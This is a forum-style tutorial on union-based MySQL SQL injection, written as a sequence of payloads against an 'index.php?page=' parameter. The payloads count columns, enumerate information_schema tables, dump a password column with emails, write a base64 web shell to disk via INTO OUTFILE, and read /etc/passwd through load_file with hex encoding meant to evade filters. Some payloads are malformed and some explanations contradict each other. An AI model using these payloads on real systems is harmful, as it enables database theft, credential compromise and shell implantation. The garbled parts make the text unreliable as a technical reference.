— SQL Injection //
Definition: SQL injection is commonly used to steal cached databases, from there, you can use Base64 values to input a shell via INTO outfile, or you can use load_file to discover results in dirs (/etc/passwd/ for example) .
Starting off, we need to use ‚ to make our error evaluate:
localhost/index.php?id='1
Be sure the number your connecting your ‚ with has correct values and input perimeters.
If you get an error familiar to:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "/" at line 1
Then that’s usually a sign of protection. What you need to do now is find out the number of columns, you can do this by using the order by — statement in MySQL:
localhost/index.php?page=-1 ORDER BY 1-- No Error localhost/index.php=-1 ORDER BY 2-- No Error localhost/index.php=-1 ORDER BY 3-- No Error localhost/index.php=-1 ORDER BY 4-- No Error localhost/index.php=-1 ORDER BY 5-- Error!
This means the number of columns are 4 (because 5 would just output an error if we used MySQL statements) .
Now we need to find the accessible columns, we can do this by using the union all select — statement:
localhost/index.php?page=-1 UNION ALL SELECT 1,2,3,4--
Now you should get a clear response with the results, if you don’t, you can try viewing the source or hovering over images to be sure it wasn’t inserted there.
Accessible Columns : 2, 1, 3
Now we need to find out the version, we can use either column 2, 1 or 3 to identify this, in this case we will be reading from column 3:
localhost/index.php?page=-1 UNION SELECT 1,@@version,3,4--
The output was: 5.0.77, >5 = vulnerable, we can use information_schema to get the table information. If its running >4, you might have to brute force the table names.
Now we need to identify all the tables, we can do this by using group_concat to return the strings, or you can just use table_name to get all the inputs back. In our case though, we are going to use a simple table_name to retrieve our results, what this tells the database is to grab all table_names from information_schema. If we were using group_concat, it would be nearly the same but slightly different.
localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables--
Now you should get a response with all the table names, after this we could simply include a syntax such as: -1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables where table_schema=dbname– but if we did that, we would have to guess the columns, instead we could use ASCII and char to broaden our attack and get the columns enlisted as well, an example being (using dbname text):
[code][/code]
localhost/index.php?page=-1 UNION ALL SELECT 1,table_name,3,4 from information_schema.tables where table_schema=char(100,98,110,97,109,101)–
100, 98, 110, 97, 109 and 101 are the ASCII code of dbname, when using Convert text applications be sure to remove the ***’s, ;’s, etc, etc.
Now we should get a response with the columns in the table we selected, for example, lets say it was this:
user_pass
email
msn
aim
To take advantage of this and read from the column, use this:
localhost/index.php?page=-1 UNION ALL SELECT 1,concat(user_pass,0x3a,email)3,4 from dbname
We use concat to return the strings, we use 0x3a which decodes as :, this is useful if you are in quite large databases.
SQL Injection — Part 2
If you want to get a shell up in public_html/root directory/~www, you can do it using the „INTO outfile“ statement in MySQL
localhost/index.php?page=-1 union select 'BASE64 VALUE' INTO OUTFILE 'prime location'
We have to include a base64/ASCII encoded shell in the „Base64 Value“ section, there are custom made shells for this you can find online. And prime location should be changed with where you want the path of the file to be.
This only works if you have FILE permission though.
SQL Injection – Part 3
If you want to gather information from dirs/files, you can use the load_file statement. Example being:
localhost/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4+from+mysql.user--
You have to have access to mysql.user, magic_quotes has to be off, and you have to have acknowledgement of the path.
You could also try accessing the file via hex value:
localhost/index.php?page=-1+union+all+select+1,load_file(0x2F6574632F706173737764),3,4+from+mysql.user--
Hex Values/ASCII code help bypass a lot of filters most webmasters have set!